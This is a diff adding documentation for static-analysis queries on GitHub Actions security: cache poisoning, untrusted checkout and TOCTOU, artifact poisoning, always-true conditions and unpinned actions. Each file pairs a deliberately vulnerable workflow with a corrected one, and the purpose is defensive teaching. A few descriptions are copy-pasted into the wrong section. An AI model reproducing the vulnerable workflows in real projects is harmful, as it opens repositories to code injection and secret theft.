+ - Clear caches regularly +3. 
Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} +``` + +### Correct Usage + +The following workflow is not vulnerable to code injections even if it runs in the context of the default branch. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + echo "$BODY" +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md new file mode 100644 index 00000000000..c3c5970c37f --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md 
@@ -0,0 +1,101 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. 
Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +### Correct Usage + +The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) 
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md new file mode 100644 index 00000000000..70df52dc463 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md 
@@ -0,0 +1,85 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL
+2. Fill the cache to trigger eviction of legitimate entries
+3. Poison cache entries with malicious payloads
+4. Achieve code execution in privileged workflows that restore the poisoned cache
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use
+ - Use short-lived, workflow-specific cache keys
+ - Clear caches regularly
+3. 
Implement strict isolation between untrusted and privileged workflow execution:
+4. Never run untrusted code in the context of the default branch
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow runs untrusted code in a non-privileged job but in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ pull_request_target:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+### Correct Usage
+
+The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch.
+
+```yaml
+name: Secure Workflow
+on:
+ pull_request:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
new file mode 100644
index 00000000000..105fe6ecd69
--- /dev/null
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
@@ -0,0 +1,168 @@
+# Untrusted Checkout TOCTOU
+
+## Description
+
+Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+
+## Recommendations
+
+Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check:
+
+- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment.
+- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+
+## Examples
+
+### Incorrect Usage (Issue Ops)
+
+The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU).
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Issue Ops)
+
+In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check.
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR Info
+ id: pr
+ env:
+ PR_NUMBER: ${{ github.event.issue.number }}
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ GH_REPO: ${{ github.repository }}
+ COMMENT_AT: ${{ github.event.comment.created_at }}
+ run: |
+ pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})"
+ head_sha="$(echo "$pr" | jq -r .head.sha)"
+ pushed_at="$(echo "$pr" | jq -r .pushed_at)"
+ if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then
+ echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)"
+ exit 1
+ fi
+ echo "head_sha=$head_sha" >> $GITHUB_OUTPUT
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.pr.outputs.head_sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Deployment Environment Approval)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Deployment Environment Approval)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Label Gates)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+### Correct Usage (Label Gates)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+## References
+
+- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md
new file mode 100644
index 00000000000..105fe6ecd69
--- /dev/null
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md
@@ -0,0 +1,168 @@
+# Untrusted Checkout TOCTOU
+
+## Description
+
+Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+
+## Recommendations
+
+Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check:
+
+- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment.
+- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+
+## Examples
+
+### Incorrect Usage (Issue Ops)
+
+The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU).
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Issue Ops)
+
+In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check.
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR Info
+ id: pr
+ env:
+ PR_NUMBER: ${{ github.event.issue.number }}
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ GH_REPO: ${{ github.repository }}
+ COMMENT_AT: ${{ github.event.comment.created_at }}
+ run: |
+ pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})"
+ head_sha="$(echo "$pr" | jq -r .head.sha)"
+ pushed_at="$(echo "$pr" | jq -r .pushed_at)"
+ if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then
+ echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)"
+ exit 1
+ fi
+ echo "head_sha=$head_sha" >> $GITHUB_OUTPUT
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.pr.outputs.head_sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Deployment Environment Approval)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Deployment Environment Approval)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Label Gates)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+### Correct Usage (Label Gates)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+## References
+
+- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU)
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md
new file mode 100644
index 00000000000..be1b566083a
--- /dev/null
+++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md
@@ -0,0 +1,63 @@
+# If Condition Always Evaluates to True
+
+## Description
+
+GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`.
+
+When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences.
+
+## Recommendation
+
+To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions:
+
+1. Do not use Workflow Expressions in `if` conditions.
+2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting.
+3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios.
+
+## Examples
+
+### Correct Usage
+
+1. Do not use Workflow Expressions:
+
+```yaml
+if: steps.checks.outputs.safe_to_run == true
+if: |-
+ steps.checks.outputs.safe_to_run == true
+if: |
+ steps.checks.outputs.safe_to_run == true
+```
+
+2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters:
+
+```yaml
+if: ${{ steps.checks.outputs.safe_to_run == true }}
+if: |-
+ ${{ steps.checks.outputs.safe_to_run == true }}
+```
+
+### Incorrect Usage
+
+1. Do not mix Workflow Expressions with un-delimited expressions:
+
+```yaml
+if: ${{ steps.checks.outputs.safe_to_run }} == true
+```
+
+2. 
Do not include trailing new lines or spaces:
+
+```yaml
+if: |
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: >
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: " ${{ steps.checks.outputs.safe_to_run == true }}"
+if: |+
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: >+
+ ${{ steps.checks.outputs.safe_to_run == true }}
+```
+
+## References
+
+- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173)
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
new file mode 100644
index 00000000000..2d7afb6b66e
--- /dev/null
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
@@ -0,0 +1,72 @@
+# Artifact poisoning
+
+## Description
+
+The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Always consider artifacts content as untrusted.
+- Extract the contents of artifacts to a temporary folder so they cannot override existing files.
+- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+### Correct Usage
+
+The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - run: mkdir -p ${{ runner.temp }}/artifacts/
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ path: ${{ runner.temp }}/artifacts/
+
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
new file mode 100644
index 00000000000..2d7afb6b66e
--- /dev/null
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
@@ -0,0 +1,72 @@
+# Artifact poisoning
+
+## Description
+
+The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Always consider artifacts content as untrusted.
+- Extract the contents of artifacts to a temporary folder so they cannot override existing files.
+- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+### Correct Usage
+
+The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - run: mkdir -p ${{ runner.temp }}/artifacts/
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ path: ${{ runner.temp }}/artifacts/
+
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
new file mode 100644
index 00000000000..eab708f8602
--- /dev/null
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
@@ -0,0 +1,27 @@
+# Unpinned tag for 3rd party Action in workflow
+
+## Description
+
+Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
+
+## Recommendations
+
+Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+- uses: tj-actions/changed-files@v44
+```
+
+### Correct Usage
+
+```yaml
+- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44
+```
+
+## References
+
+- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
new file mode 100644
index 00000000000..c391e1255ed
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
@@ -0,0 +1,137 @@
+# Execution of Untrusted Checkedout Code
+
+## Description
+
+GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Avoid using `pull_request_target` unless necessary.
+- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
+- Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
+
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+
+The artifacts downloaded from the first workflow should be considered untrusted and verified.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker:
+
+```yaml
+on: pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
+```
+
+### Correct Usage
+
+An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context.
+
+**ReceivePR.yml** (untrusted PR handling with artifact creation):
+
+```yaml
+name: Receive PR
+on:
+ pull_request:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Build
+ run: /bin/bash ./build.sh
+ - name: Save PR number
+ run: |
+ mkdir -p ./pr
+ echo ${{ github.event.number }} > ./pr/NR
+ - uses: actions/upload-artifact@v2
+ with:
+ name: pr
+ path: pr/
+```
+
+**CommentPR.yml** (processing artifacts with privileged access):
+
+```yaml
+name: Comment on the pull request
+on:
+ workflow_run:
+ workflows: ["Receive PR"]
+ types:
+ - completed
+jobs:
+ upload:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: "Download artifact"
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{github.event.workflow_run.id }},
+ });
+ var matchArtifact = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "pr";
+ })[0];
+ var download = await 
github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data));
+ - run: |
+ mkdir -p tmp
+ unzip -d tmp/ pr.zip
+ - name: "Comment on PR"
+ uses: actions/github-script@v3
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ var fs = require('fs');
+ var issue_number = Number(fs.readFileSync('./tmp/NR'));
+ // Verify that the file contains a numeric value
+ const contains_numeric = /\d/.test(issue_number);
+ if (contains_numeric) {
+ await github.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: issue_number,
+ body: 'Everything is OK. Thank you for the PR!'
+ });
+ }
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
